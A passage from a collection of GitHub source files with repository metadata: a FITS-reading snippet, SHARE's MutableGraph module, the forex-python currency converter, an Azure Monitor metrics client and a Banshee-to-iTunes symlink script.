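# out of a table HDU by name. The HDU index and the column name below are
# assumptions made for demonstration only.
def _example_read_column_sketch(path):
    with fits.open(path) as hdul:
        table_hdu = hdul[1]  # assume the second HDU is a binary table
        return table_hdu.data["ENERGY"]  # column access yields a Numpy array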
| {
"content_hash": "5bd5c59afe24ea3d5e0b9fff58856db0",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 88,
"avg_line_length": 21.22222222222222,
"alnum_prop": 0.5198204936424832,
"repo_name": "jeremiedecock/snippets",
"id": "f9d57773d0f7a5efce2b87c39d6da4c2d19cd59e",
"size": "1697",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/astropy/fits/read_fits_table.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "AMPL",
"bytes": "4294"
},
{
"name": "Batchfile",
"bytes": "6779"
},
{
"name": "C",
"bytes": "102107"
},
{
"name": "C++",
"bytes": "320943"
},
{
"name": "CMake",
"bytes": "11424"
},
{
"name": "CSS",
"bytes": "21121"
},
{
"name": "Cython",
"bytes": "21"
},
{
"name": "Dockerfile",
"bytes": "1818"
},
{
"name": "Fortran",
"bytes": "633"
},
{
"name": "Gnuplot",
"bytes": "39999"
},
{
"name": "Go",
"bytes": "3166"
},
{
"name": "Groovy",
"bytes": "3009"
},
{
"name": "HTML",
"bytes": "138995"
},
{
"name": "IDL",
"bytes": "43"
},
{
"name": "Java",
"bytes": "120221"
},
{
"name": "JavaScript",
"bytes": "32342"
},
{
"name": "Jinja",
"bytes": "206"
},
{
"name": "Jupyter Notebook",
"bytes": "95991"
},
{
"name": "Lua",
"bytes": "200"
},
{
"name": "M4",
"bytes": "111"
},
{
"name": "MATLAB",
"bytes": "31972"
},
{
"name": "Makefile",
"bytes": "81307"
},
{
"name": "OpenSCAD",
"bytes": "14995"
},
{
"name": "PHP",
"bytes": "94"
},
{
"name": "Perl",
"bytes": "46"
},
{
"name": "Processing",
"bytes": "208"
},
{
"name": "Prolog",
"bytes": "454"
},
{
"name": "Python",
"bytes": "1685966"
},
{
"name": "R",
"bytes": "76"
},
{
"name": "Raku",
"bytes": "43"
},
{
"name": "Ruby",
"bytes": "42"
},
{
"name": "Scheme",
"bytes": "649"
},
{
"name": "Shell",
"bytes": "52865"
},
{
"name": "Smalltalk",
"bytes": "55"
},
{
"name": "TeX",
"bytes": "1189"
},
{
"name": "Vue",
"bytes": "49445"
},
{
"name": "XSLT",
"bytes": "1816"
}
],
"symlink_target": ""
} |
from enum import Enum, auto
from operator import attrgetter
import networkx as nx
import pendulum
import uuid
from share.exceptions import ShareException
from share.schema import ShareV2Schema
from share.schema.exceptions import SchemaKeyError
from share.schema.shapes import AttributeDataType, RelationShape
from share.util import TopologicalSorter
class MutableGraphError(ShareException):
pass
class PrivateNodeAttrs(Enum):
TYPE = auto()
class EdgeAttrs(Enum):
FROM_NAME = auto()
TO_NAME = auto()
def resolve_field(type_name, field_name):
try:
return ShareV2Schema().get_field(type_name, field_name)
except SchemaKeyError:
return None
# TODO: ImmutableGraph (don't allow mutation and error on non-existent attr/relation)
class MutableGraph(nx.DiGraph):
"""NetworkX DiGraph with some SHARE-specific features.
Nodes in the DiGraph are string IDs. Uses MutableNode as a convenience interface to access/manipulate nodes.
Provides the abstraction of named edges:
* Each named edge has two names: `from_name` and `to_name`
* the "from" node knows the edge by its `from_name`
* the "to" node knows the edge by its `to_name`
* correspond to a foreign key and its related field
* All outgoing edges from a node must be unique on `from_name`
Example: Find all URIs identifying a work
```
work = graph.get_node(work_id)
uris = [identifier['uri'] for identifier in work['identifiers']]
```
Example: Remove all orphan nodes (no incoming or outgoing edges)
```
orphans = graph.filter_nodes(lambda n: not graph.degree(n))
for orphan in orphans:
graph.remove_node(orphan.id)
```
"""
@classmethod
def from_jsonld(cls, nodes):
"""Create a mutable graph from a list of JSON-LD-style dicts.
"""
central_node_id = None
if isinstance(nodes, dict):
central_node_id = nodes.get('central_node_id', None)
nodes = nodes['@graph']
graph = cls()
if central_node_id:
graph.central_node_id = central_node_id
for n in nodes:
node_id, node_type = None, None
attrs = {}
for k, v in n.items():
if k == '@id':
node_id = v
elif k == '@type':
node_type = v
elif isinstance(v, dict) and k != 'extra':
graph.add_node(v['@id'], v['@type'])
attrs[k] = v['@id']
elif isinstance(v, list):
pass # Don't bother with incoming edges, let the other node point here
else:
attrs[k] = v
if not node_id or not node_type:
raise MutableGraphError('Nodes must have id and type')
graph.add_node(node_id, node_type, attrs)
return graph
def __init__(self):
super().__init__()
self.changed = False
self.central_node_id = None
def to_jsonld(self, in_edges=True):
"""Return a dictionary with '@graph' and 'central_node_id' keys that will serialize
to json-ld conforming with the SHARE schema
in_edges (boolean): Include lists of incoming edges. Default True.
"""
return {
'central_node_id': self.central_node_id,
'@graph': [
node.to_jsonld(in_edges=in_edges)
for node in self.topologically_sorted()
],
}
def add_node(self, node_id, node_type, attrs=None):
"""Create a node in the graph.
node_id (hashable): Unique node ID. If None, generate a random ID.
node_type (str): The node's @type value
attrs: Dictionary of attributes or relations corresponding to fields on the node's model
Returns a MutableNode wrapper for the new node.
"""
if node_type is None:
raise MutableGraphError('Must provide `node_type` to MutableGraph.add_node')
self.changed = True
if node_id is None:
node_id = '_:{}'.format(uuid.uuid4())
super().add_node(node_id)
return MutableNode(self, node_id, node_type, attrs)
def get_node(self, node_id):
"""Get a node by ID.
node_id (hashable): Unique node ID
Returns a MutableNode wrapper for the node, or None.
"""
if node_id in self:
return MutableNode(self, node_id)
return None
def remove_node(self, node_id, cascade=True):
"""Remove a node and its incoming/outgoing edges.
node_id (hashable): Unique node ID
cascade (boolean): Also remove nodes with edges which point to this node. Default True.
"""
self.changed = True
to_remove = list(self.predecessors(node_id)) if cascade else []
super().remove_node(node_id)
for from_id in to_remove:
self.remove_node(from_id, cascade)
def filter_nodes(self, filter):
"""Filter the nodes in the graph.
filter (callable): When called with a MutableNode argument, return something truthy to
include it in the filtered list, or something falsy to omit it.
Returns list of MutableNodes.
"""
# TODO figure out common sorts of filters, make kwargs for them and optimize
return [node for node in self if filter(node)]
def filter_type(self, node_type):
# TODO make a sort of index dict, mapping type to nodes
return self.filter_nodes(lambda n: n.type == node_type.lower())
def filter_by_concrete_type(self, concrete_type):
# TODO make a sort of index dict, mapping concrete_type to nodes
lower_concrete_type = concrete_type.lower()
return self.filter_nodes(lambda n: n.concrete_type == lower_concrete_type)
def add_named_edge(self, from_id, to_id, from_name, to_name):
"""Add a named edge.
from_id (hashable): Unique ID for the node this edge comes from
to_id (hashable): Unique ID for the node this edge points to
from_name (str): Name of the edge on its 'from' node (must be unique on the node)
to_name (str): Name of the edge on its 'to' node
"""
if any(data.get(EdgeAttrs.FROM_NAME) == from_name
for _, _, data in self.out_edges(from_id, data=True)):
raise MutableGraphError('Out-edge names must be unique on the node')
self.changed = True
self.add_edge(from_id, to_id)
self.edges[from_id, to_id][EdgeAttrs.FROM_NAME] = from_name
self.edges[from_id, to_id][EdgeAttrs.TO_NAME] = to_name
def remove_named_edge(self, from_id, from_name):
"""Remove a named edge.
from_id (hashable): Unique ID for the node this edge comes from
from_name (str): Name of the edge on its 'from' node
"""
self.changed = True
try:
to_id = next(
to_id for _, to_id, data
in self.out_edges(from_id, data=True)
if data.get(EdgeAttrs.FROM_NAME) == from_name
)
self.remove_edge(from_id, to_id)
except StopIteration:
pass
def resolve_named_out_edge(self, from_id, from_name):
"""Get the node a named edge points to.
from_id (hashable): Unique ID for the node this edge comes from
from_name (str): Name of the edge on its 'from' node
Returns a MutableNode wrapper for the node the edge points to.
"""
try:
return next(
MutableNode(self, to_id) for _, to_id, data
in self.out_edges(from_id, data=True)
if data.get(EdgeAttrs.FROM_NAME) == from_name
)
except StopIteration:
return None
def resolve_named_in_edges(self, to_id, to_name):
"""Get all nodes which point to a node with the same named edges.
to_id (hashable): Unique ID for the node these edges point to
to_name (str): Name of the edges on their 'to' node
Returns list of MutableNode wrappers for the nodes these edges come from.
"""
return [
MutableNode(self, from_id) for from_id, _, data
in self.in_edges(to_id, data=True)
if data.get(EdgeAttrs.TO_NAME) == to_name
]
def named_out_edges(self, from_id):
"""Get all outgoing named edges from a node.
from_id (hashable): Unique node ID
Returns dict with:
keys: `from_name` of each outgoing edge
values: MutableNode wrapper for the node each edge points to
"""
return {
data[EdgeAttrs.FROM_NAME]: MutableNode(self, to_id) for _, to_id, data
in self.out_edges(from_id, data=True)
if data.get(EdgeAttrs.FROM_NAME) is not None
}
def named_in_edges(self, to_id):
"""Get all incoming named edges to a node.
to_id (hashable): Unique node ID
Returns dict of edges with:
keys: `to_name` of each incoming edge
values: list of MutableNode wrappers for the nodes each edge comes from
"""
in_edges = {}
for from_id, _, data in self.in_edges(to_id, data=True):
to_name = data.get(EdgeAttrs.TO_NAME)
if to_name is not None:
in_edges.setdefault(to_name, []).append(MutableNode(self, from_id))
return in_edges
def merge_nodes(self, from_node, into_node):
"""Merge a nodes attrs and edges into another node.
"""
if from_node.concrete_type != into_node.concrete_type:
raise MutableGraphError('Cannot merge nodes of different types')
self.changed = True
        # into_node will have the more specific type
if from_node.schema_type.distance_from_concrete_type > into_node.schema_type.distance_from_concrete_type:
from_node, into_node = into_node, from_node
self._merge_node_attrs(from_node, into_node)
self._merge_in_edges(from_node, into_node)
self._merge_out_edges(from_node, into_node)
from_node.delete(cascade=False)
def topologically_sorted(self):
return TopologicalSorter(
sorted(self, key=attrgetter('id')),
dependencies=lambda n: sorted(self.successors(n.id)),
key=attrgetter('id'),
).sorted()
def __iter__(self):
return (MutableNode(self, node_id) for node_id in super().__iter__())
def __contains__(self, n):
if isinstance(n, MutableNode):
n = n.id
return super().__contains__(n)
def __bool__(self):
return bool(len(self))
def _merge_node_attrs(self, from_node, into_node):
into_attrs = into_node.attrs()
for k, new_val in from_node.attrs().items():
if k in into_attrs:
old_val = into_attrs[k]
if new_val == old_val:
continue
field = resolve_field(into_node.type, k)
if getattr(field, 'data_type', None) == AttributeDataType.DATETIME:
new_val = max(pendulum.parse(new_val), pendulum.parse(old_val)).isoformat()
else:
new_val = self._merge_value(new_val, old_val)
into_node[k] = new_val
def _merge_value(self, value_a, value_b):
# use the longer value, or the first alphabetically if they're the same length
return sorted([value_a, value_b], key=lambda x: (-len(str(x)), str(x)))[0]
def _merge_in_edges(self, from_node, into_node):
for in_edge_name, source_nodes in self.named_in_edges(from_node.id).items():
inverse_relation = resolve_field(from_node.type, in_edge_name).inverse_relation
for source_node in source_nodes:
source_node[inverse_relation] = into_node
def _merge_out_edges(self, from_node, into_node):
into_edges = self.named_out_edges(into_node.id)
for edge_name, from_target in self.named_out_edges(from_node.id).items():
into_target = into_edges.get(edge_name)
if from_target != into_target:
self.merge_nodes(from_target, into_target)
def get_central_node(self, guess=False):
if guess and self.central_node_id is None:
self._guess_central_node()
return self.get_node(self.central_node_id)
def _guess_central_node(self):
# use a heuristic to guess the "central" node, when it's not given
# (the whole idea of guessing here is a hack to handle old data --
# hopefully we can get away from it eventually)
def centrality_heuristic(work_node):
# return a tuple of numbers (and booleans), where
# higher numbers (including `True`s) => more likely central
has_identifiers = bool(work_node['identifiers'])
has_contributor_info = bool(work_node['agent_relations'])
how_much_total_info = (
len(work_node.attrs())
+ len(self.in_edges(work_node.id))
+ len(self.out_edges(work_node.id))
)
how_much_contributor_info = len(work_node['agent_relations'])
has_parent_work = any(
relation.type == 'ispartof'
for relation in work_node['outgoing_creative_work_relations']
)
return (
has_identifiers,
has_contributor_info,
how_much_total_info,
how_much_contributor_info,
has_parent_work,
)
work_nodes = self.filter_by_concrete_type('abstractcreativework')
if work_nodes:
# get the work node with the most attrs+relations
work_nodes.sort(key=centrality_heuristic, reverse=True)
if (
len(work_nodes) > 1
and centrality_heuristic(work_nodes[0]) == centrality_heuristic(work_nodes[1])
):
raise MutableGraphError(f'cannot guess central node -- multiple candidates ({work_nodes[0].id}, {work_nodes[1].id})')
central_node = work_nodes[0]
self.central_node_id = central_node.id
class MutableNode:
"""Convenience wrapper around a node in a MutableGraph.
"""
def __new__(cls, graph, node_id, *args, **kwargs):
if node_id not in graph:
return graph.add_node(node_id, *args, **kwargs)
return super().__new__(cls)
def __init__(self, graph, node_id, type_name=None, attrs=None):
self.__graph = graph
self.__id = node_id
self.__attrs = graph.nodes[node_id]
if type_name:
self.type = type_name
if attrs:
self.update(attrs)
@property
def id(self):
return self.__id
@property
def graph(self):
return self.__graph
@property
def type(self):
return self.__attrs[PrivateNodeAttrs.TYPE]
@type.setter
def type(self, value):
self.graph.changed = True
schema_type = ShareV2Schema().get_type(value)
self.__attrs.update({
PrivateNodeAttrs.TYPE: schema_type.name.lower(),
})
@property
def concrete_type(self):
return self.schema_type.concrete_type.lower()
@property
def schema_type(self):
return ShareV2Schema().get_type(self.type)
def attrs(self):
return {
k: v for k, v in self.__attrs.items()
if k not in PrivateNodeAttrs
}
def relations(self, in_edges=True, jsonld=False):
relations = {}
for from_name, node in self.graph.named_out_edges(self.id).items():
relations[from_name] = node.to_jsonld(ref=True) if jsonld else node
if in_edges:
for to_name, nodes in self.graph.named_in_edges(self.id).items():
sorted_nodes = sorted(nodes, key=lambda n: n.id)
relations[to_name] = [n.to_jsonld(ref=True) for n in sorted_nodes] if jsonld else sorted_nodes
return relations
def __getitem__(self, key):
"""Get an attribute value or related node(s).
key (str): Name of an attribute, outgoing named edge, or incoming named edge.
If key is the name of a plain attribute in the SHARE schema, return that attribute's value.
If key is the name of an outgoing edge, return a MutableNode that edge points to
If key is the name of incoming edges, return a list of MutableNodes those edges come from
"""
field = resolve_field(self.type, key)
if field and field.is_relation and field.name != 'extra':
if field.relation_shape == RelationShape.MANY_TO_ONE:
return self.graph.resolve_named_out_edge(self.id, field.name)
if field.relation_shape == RelationShape.ONE_TO_MANY:
return self.graph.resolve_named_in_edges(self.id, field.name)
if field.relation_shape == RelationShape.MANY_TO_MANY:
m2m_related_nodes = self._resolve_many_to_many(
field.through_concrete_type,
field.incoming_through_relation,
field.outgoing_through_relation,
)
is_reflexive = (field.related_concrete_type.lower() == self.concrete_type)
if is_reflexive:
# for a reflexive m2m, include nodes related in either direction
m2m_related_nodes.update(self._resolve_many_to_many(
field.through_concrete_type,
# outgoing/incoming swapped
field.outgoing_through_relation,
field.incoming_through_relation,
))
return list(m2m_related_nodes)
raise MutableGraphError('Only many-to-one, one-to-many, and non-reflexive many-to-many relations allowed')
return self.__attrs.get(field.name if field else key)
def _resolve_many_to_many(self, through_concrete_type, incoming_through_relation, outgoing_through_relation):
incoming_edge_name = ShareV2Schema().get_field(
through_concrete_type,
incoming_through_relation
).inverse_relation
through_nodes = self.graph.resolve_named_in_edges(self.id, incoming_edge_name)
return set(
self.graph.resolve_named_out_edge(through_node.id, outgoing_through_relation)
for through_node in through_nodes
)
def __setitem__(self, key, value):
"""Set an attribute value or add an outgoing named edge.
key (str): Name of an attribute or an outgoing edge.
If key is the name of a plain attribute in the SHARE schema, set that attribute's value.
If key is the name of an outgoing edge, expect `value` to be a node ID or a MutableNode. Add an edge from this node to that one.
If key is the name of incoming edges, raise an error.
If value is None, same as `del node[key]`
"""
self.graph.changed = True
field = resolve_field(self.type, key)
field_name = field.name if field else key
if value is None:
del self[field_name]
return
if field and field.is_relation:
if field.relation_shape != RelationShape.MANY_TO_ONE:
raise MutableGraphError('Can set only many-to-one relations')
to_id = value.id if hasattr(value, 'id') else value
self.graph.remove_named_edge(self.id, field_name)
self.graph.add_named_edge(self.id, to_id, field_name, field.inverse_relation)
else:
self.__attrs[field_name] = value
def __delitem__(self, key):
"""Delete an attribute value or outgoing named edge.
key (str): Name of an attribute or an outgoing edge.
If key is the name of an attribute in the SHARE schema, delete that attribute from this node.
If key is the name of an outgoing edge, remove that edge.
If key is the name of incoming edges, raise an error.
"""
self.graph.changed = True
field = resolve_field(self.type, key)
field_name = field.name if field else key
if field and field.is_relation:
if field.relation_shape != RelationShape.MANY_TO_ONE:
raise MutableGraphError('Can delete only many-to-one relations')
self.graph.remove_named_edge(self.id, field_name)
elif field_name in self.__attrs:
del self.__attrs[field_name]
def update(self, attrs):
for k, v in attrs.items():
self[k] = v
def delete(self, cascade=True):
"""Remove this node from its graph.
cascade (boolean): Also remove nodes with edges which point to this node. Default True.
"""
self.graph.changed = True
self.graph.remove_node(self.id, cascade)
self.__graph = None
def to_jsonld(self, ref=False, in_edges=False):
ld_node = {
'@id': self.id,
'@type': self.type,
}
if not ref:
ld_node.update(self.relations(in_edges=in_edges, jsonld=True))
ld_node.update(self.attrs())
return ld_node
def __eq__(self, other):
return isinstance(other, self.__class__) and other.graph is self.graph and other.id == self.id
def __hash__(self):
return hash(self.id)
def __str__(self):
return '<{} id({}) type({})>'.format(self.__class__.__name__, self.id, self.type)
__repr__ = __str__
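# Illustrative sketch, not part of the original module: build a tiny graph
# from JSON-LD-style dicts and read a relation back from the central node.
# The node types and field names below are assumed to exist in the SHARE v2
# schema.
def _example_graph_sketch():
    graph = MutableGraph.from_jsonld({
        'central_node_id': '_:work1',
        '@graph': [
            {'@id': '_:work1', '@type': 'creativework',
             'title': 'An example work'},
            {'@id': '_:id1', '@type': 'workidentifier',
             'uri': 'https://example.org/work/1',
             'creative_work': {'@id': '_:work1', '@type': 'creativework'}},
        ],
    })
    work = graph.get_central_node()
    return [identifier['uri'] for identifier in work['identifiers']]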
| {
"content_hash": "b1d7621f6ff38e220ed31abe0a3256c9",
"timestamp": "",
"source": "github",
"line_count": 581,
"max_line_length": 136,
"avg_line_length": 37.44750430292599,
"alnum_prop": 0.5890058372018201,
"repo_name": "aaxelb/SHARE",
"id": "21c7094fb83c7b02598f51d2f51d078ea7a941f0",
"size": "21757",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "share/util/graph.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3321"
},
{
"name": "Dockerfile",
"bytes": "1143"
},
{
"name": "Gherkin",
"bytes": "4346"
},
{
"name": "HTML",
"bytes": "4834"
},
{
"name": "Python",
"bytes": "1450482"
},
{
"name": "Shell",
"bytes": "408"
}
],
"symlink_target": ""
} |
import os
from decimal import Decimal
import requests
import simplejson as json
class RatesNotAvailableError(Exception):
"""
    Custom exception raised when https://theforexapi.com is down and currency rates are not available
"""
pass
class DecimalFloatMismatchError(Exception):
"""
A float has been supplied when force_decimal was set to True
"""
pass
class Common:
def __init__(self, force_decimal=False):
self._force_decimal = force_decimal
def _source_url(self):
return "https://theforexapi.com/api/"
def _get_date_string(self, date_obj):
if date_obj is None:
return 'latest'
date_str = date_obj.strftime('%Y-%m-%d')
return date_str
def _decode_rates(self, response, use_decimal=False, date_str=None):
if self._force_decimal or use_decimal:
decoded_data = json.loads(response.text, use_decimal=True)
else:
decoded_data = response.json()
# if (date_str and date_str != 'latest' and date_str != decoded_data.get('date')):
# raise RatesNotAvailableError("Currency Rates Source Not Ready")
return decoded_data.get('rates', {})
def _get_decoded_rate(
self, response, dest_cur, use_decimal=False, date_str=None):
return self._decode_rates(
response, use_decimal=use_decimal, date_str=date_str).get(
dest_cur, None)
class CurrencyRates(Common):
def get_rates(self, base_cur, date_obj=None):
date_str = self._get_date_string(date_obj)
payload = {'base': base_cur, 'rtype': 'fpy'}
source_url = self._source_url() + date_str
response = requests.get(source_url, params=payload)
if response.status_code == 200:
rates = self._decode_rates(response, date_str=date_str)
return rates
raise RatesNotAvailableError("Currency Rates Source Not Ready")
def get_rate(self, base_cur, dest_cur, date_obj=None):
if base_cur == dest_cur:
if self._force_decimal:
return Decimal(1)
return 1.
date_str = self._get_date_string(date_obj)
payload = {'base': base_cur, 'symbols': dest_cur, 'rtype': 'fpy'}
source_url = self._source_url() + date_str
response = requests.get(source_url, params=payload)
if response.status_code == 200:
rate = self._get_decoded_rate(response, dest_cur, date_str=date_str)
if not rate:
raise RatesNotAvailableError("Currency Rate {0} => {1} not available for Date {2}".format(
base_cur, dest_cur, date_str))
return rate
raise RatesNotAvailableError("Currency Rates Source Not Ready")
def convert(self, base_cur, dest_cur, amount, date_obj=None):
if isinstance(amount, Decimal):
use_decimal = True
else:
use_decimal = self._force_decimal
if base_cur == dest_cur: # Return same amount if both base_cur, dest_cur are same
if use_decimal:
return Decimal(amount)
return float(amount)
date_str = self._get_date_string(date_obj)
payload = {'base': base_cur, 'symbols': dest_cur, 'rtype': 'fpy'}
source_url = self._source_url() + date_str
response = requests.get(source_url, params=payload)
if response.status_code == 200:
rate = self._get_decoded_rate(
response, dest_cur, use_decimal=use_decimal, date_str=date_str)
if not rate:
raise RatesNotAvailableError("Currency {0} => {1} rate not available for Date {2}.".format(
                    base_cur, dest_cur, date_str))
try:
converted_amount = rate * amount
return converted_amount
except TypeError:
raise DecimalFloatMismatchError(
"convert requires amount parameter is of type Decimal when force_decimal=True")
raise RatesNotAvailableError("Currency Rates Source Not Ready")
_CURRENCY_FORMATTER = CurrencyRates()
get_rates = _CURRENCY_FORMATTER.get_rates
get_rate = _CURRENCY_FORMATTER.get_rate
convert = _CURRENCY_FORMATTER.convert
class CurrencyCodes:
def __init__(self):
self.__currency_data = None
@property
def _currency_data(self):
if self.__currency_data is None:
file_path = os.path.dirname(os.path.abspath(__file__))
with open(file_path + '/raw_data/currencies.json') as f:
self.__currency_data = json.loads(f.read())
return self.__currency_data
def _get_data(self, currency_code):
currency_dict = next((item for item in self._currency_data if item["cc"] == currency_code), None)
return currency_dict
def _get_data_from_symbol(self, symbol):
currency_dict = next((item for item in self._currency_data if item["symbol"] == symbol), None)
return currency_dict
def get_symbol(self, currency_code):
currency_dict = self._get_data(currency_code)
if currency_dict:
return currency_dict.get('symbol')
return None
def get_currency_name(self, currency_code):
currency_dict = self._get_data(currency_code)
if currency_dict:
return currency_dict.get('name')
return None
def get_currency_code_from_symbol(self, symbol):
currency_dict = self._get_data_from_symbol(symbol)
if currency_dict:
return currency_dict.get('cc')
return None
_CURRENCY_CODES = CurrencyCodes()
get_symbol = _CURRENCY_CODES.get_symbol
get_currency_name = _CURRENCY_CODES.get_currency_name
get_currency_code_from_symbol = _CURRENCY_CODES.get_currency_code_from_symbol
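# Illustrative sketch, not part of the original module: the module-level
# shortcuts defined above can be used directly. Live network access to
# https://theforexapi.com is required; the currencies and amount are
# arbitrary examples.
def _example_converter_sketch():
    rates = get_rates('USD')              # dict of rates against USD
    eur_per_usd = get_rate('USD', 'EUR')  # single rate as a float
    amount = convert('USD', 'EUR', 10)    # 10 USD expressed in EUR
    symbol = get_symbol('GBP')            # currency symbol for GBP
    return rates, eur_per_usd, amount, symbol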
| {
"content_hash": "b7b143c53b80782b8629ca8edb15880f",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 107,
"avg_line_length": 35.7962962962963,
"alnum_prop": 0.6137265045697534,
"repo_name": "MicroPyramid/forex-python",
"id": "390a11a175c40ef6ed47c577d21425bfe6193dbf",
"size": "5799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "forex_python/converter.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "32379"
}
],
"symlink_target": ""
} |
import uuid
from msrest.pipeline import ClientRawResponse
from .. import models
class MetricsOperations(object):
"""MetricsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
:ivar api_version: Client Api Version. Constant value: "2017-05-01-preview".
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-05-01-preview"
self.config = config
def list(
self, resource_uri, timespan=None, interval=None, metric=None, aggregation=None, top=None, orderby=None, filter=None, result_type=None, custom_headers=None, raw=False, **operation_config):
"""**Lists the metric values for a resource**.
:param resource_uri: The identifier of the resource.
:type resource_uri: str
:param timespan: The timespan of the query. It is a string with the
following format 'startDateTime_ISO/endDateTime_ISO'.
:type timespan: str
:param interval: The interval (i.e. timegrain) of the query.
:type interval: timedelta
:param metric: The name of the metric to retrieve.
:type metric: str
:param aggregation: The list of aggregation types (comma separated) to
retrieve.
:type aggregation: str
:param top: The maximum number of records to retrieve.
Valid only if $filter is specified.
Defaults to 10.
:type top: float
:param orderby: The aggregation to use for sorting results and the
direction of the sort.
Only one order can be specified.
Examples: sum asc.
:type orderby: str
:param filter: The **$filter** is used to reduce the set of metric
data returned.<br>Example:<br>Metric contains metadata A, B and
C.<br>- Return all time series of C where A = a1 and B = b1 or
b2<br>**$filter=A eq ‘a1’ and B eq ‘b1’ or B eq ‘b2’ and C eq
‘*’**<br>- Invalid variant:<br>**$filter=A eq ‘a1’ and B eq ‘b1’ and C
eq ‘*’ or B = ‘b2’**<br>This is invalid because the logical or
operator cannot separate two different metadata names.<br>- Return all
time series where A = a1, B = b1 and C = c1:<br>**$filter=A eq ‘a1’
and B eq ‘b1’ and C eq ‘c1’**<br>- Return all time series where A =
a1<br>**$filter=A eq ‘a1’ and B eq ‘*’ and C eq ‘*’**.
:type filter: str
:param result_type: Reduces the set of data collected. The syntax
allowed depends on the operation. See the operation's description for
details. Possible values include: 'Data', 'Metadata'
:type result_type: str or ~azure.mgmt.monitor.models.ResultType
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Response or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.monitor.models.Response or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.monitor.models.ErrorResponseException>`
"""
# Construct URL
url = '/{resourceUri}/providers/microsoft.insights/metrics'
path_format_arguments = {
'resourceUri': self._serialize.url("resource_uri", resource_uri, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timespan is not None:
query_parameters['timespan'] = self._serialize.query("timespan", timespan, 'str')
if interval is not None:
query_parameters['interval'] = self._serialize.query("interval", interval, 'duration')
if metric is not None:
query_parameters['metric'] = self._serialize.query("metric", metric, 'str')
if aggregation is not None:
query_parameters['aggregation'] = self._serialize.query("aggregation", aggregation, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'float')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if result_type is not None:
query_parameters['resultType'] = self._serialize.query("result_type", result_type, 'ResultType')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Response', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
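# Illustrative sketch, not part of the original file: typical use through the
# generated service client. Constructing the client and the resource URI are
# outside this file and are assumptions here; the metric name is an example.
def _example_list_metrics_sketch(monitor_client, resource_uri):
    import datetime
    return monitor_client.metrics.list(
        resource_uri,
        timespan='2017-05-01T00:00:00Z/2017-05-02T00:00:00Z',
        interval=datetime.timedelta(hours=1),
        metric='Percentage CPU',
        aggregation='Average',
    )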
| {
"content_hash": "d6d69854e7ae357a0ca07f220f53ef5f",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 200,
"avg_line_length": 47.43846153846154,
"alnum_prop": 0.6416409923787904,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "aca37e3d615383dfcfc6ef9b6a8b5dd98d19699e",
"size": "6697",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-monitor/azure/mgmt/monitor/operations/metrics_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
import sys, shutil, hashlib, os.path, urllib.parse, sqlite3
target_dir = os.path.expanduser("~/.banshee2itunes")
# remove the data directory if it exists
if os.path.lexists(target_dir):
shutil.rmtree(target_dir)
os.makedirs(target_dir + "/music/")
# make an in-memory copy of the database in case Banshee changes it while
# we're using it
#
# http://stackoverflow.com/q/4019081/612279
db = sqlite3.connect(":memory:")
live_db = sqlite3.connect(os.path.expanduser("~/.config/banshee-1/banshee.db"))
query = "".join(line for line in live_db.iterdump())
db.executescript(query)
db.commit()
live_db.close()
# get a complete list of tracks in Banshee
c = db.cursor()
c.execute("SELECT Uri FROM CoreTracks WHERE PrimarySourceID = 1")
for row in c:
uri = urllib.parse.urlparse(row[0])
if uri.scheme == "file":
path = urllib.parse.unquote(uri.path)
if not os.path.isfile(path):
sys.stderr.write("File \"{}\" is in library but does not exist (?)".format(path))
continue
# the original idea was to use the file's hash as part of the
# name of the symlink, but that doesn't really provide any benefits
# and can potentially result in many GBs of reads
#
# instead just hash the path
hash_val = hashlib.sha1(path.encode("utf-8")).hexdigest()
ext = os.path.splitext(path)[1].lower()
os.symlink(path, target_dir + "/music/" + hash_val + ext)
| {
"content_hash": "ec9770837860a42a9adffbfc8a7198c4",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 84,
"avg_line_length": 29.891304347826086,
"alnum_prop": 0.7025454545454546,
"repo_name": "chriskuehl/banshee2itunes",
"id": "ac986ef49acc91b5630af100fc45148aba2352a9",
"size": "1398",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "banshee2itunes.py",
"mode": "33261",
"license": "mit",
"language": [
{
